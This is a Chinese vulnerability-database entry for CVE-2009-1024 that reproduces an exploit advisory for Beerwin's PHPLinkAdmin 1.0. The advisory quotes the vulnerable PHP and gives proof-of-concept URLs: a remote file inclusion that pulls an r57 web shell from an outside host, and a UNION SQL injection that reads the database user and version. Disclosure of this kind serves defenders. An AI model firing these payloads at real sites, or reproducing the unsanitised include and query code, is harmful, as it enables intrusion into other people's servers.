Beerwin's PhpLinkAdmin 'edlink.php'及其他未明向量SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117475 漏洞类型 SQL注入
发布时间 2009-03-16 更新时间 2009-03-26
CVE编号 CVE-2009-1024 CNNVD-ID CNNVD-200903-343
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8216
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-343
|漏洞详情
BeerwinPHPLinkAdmin1.0版本中存在多个SQL注入漏洞。远程攻击者可以借助对edlink.php和其他未明向量的linkid参数,执行任意SQL指令。
|漏洞EXP
#######################################################################################################################
[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################################################################################

[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18

[+] Remote File Inclusion

 Direct acces to linkadmin.No auth.

 Vulnerable code in linkadmin.php :

-------------------------------------------------------------------------------------------
$page = $_REQUEST['page'];
if (!$page){
echo "Welcome to the PHPLINKADMIN!.<br> Please select an action from
the left menu.";
}else{
include $page;
}
--------------------------------------------------------------------------------------------

 PoC :

   http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt?

========================================================================================================================

[+] Remote SQL Injection

  Is a lot of SQL Injection vulnerabilities in the script.I will
present only one.

  Vulnerable code in edlink.php :

-----------------------------------------------------------------------------------------------
$linkid=$_REQUEST['linkid'];
if (!$linkid){
  echo "Error: Link missing! <br />";
}else{
  $sql=mysql_query("SELECT * FROM linktable WHERE linkid='$linkid'")
or die(mysql_error());
-----------------------------------------------------------------------------------------------

 PoC :

   http://127.0.0.1/path/edlink.php?linkid=-1' union all select
1,2,3,4,concat_ws(0x3a,user(),database(),version())'--

 No important things to extract from database.

=========================================================================================================================


#######################################################################################################################

# milw0rm.com [2009-03-16]
|参考资料

来源:XF
名称:phplinkadmin-edlink-sql-injection(49265)
链接:http://xforce.iss.net/xforce/xfdb/49265
来源:VUPEN
名称:ADV-2009-0733
链接:http://www.vupen.com/english/advisories/2009/0733
来源:BID
名称:34129
链接:http://www.securityfocus.com/bid/34129
来源:MILW0RM
名称:8216
链接:http://www.milw0rm.com/exploits/8216
来源:SECUNIA
名称:34323
链接:http://secunia.com/advisories/34323
来源:OSVDB
名称:52779
链接:http://osvdb.org/52779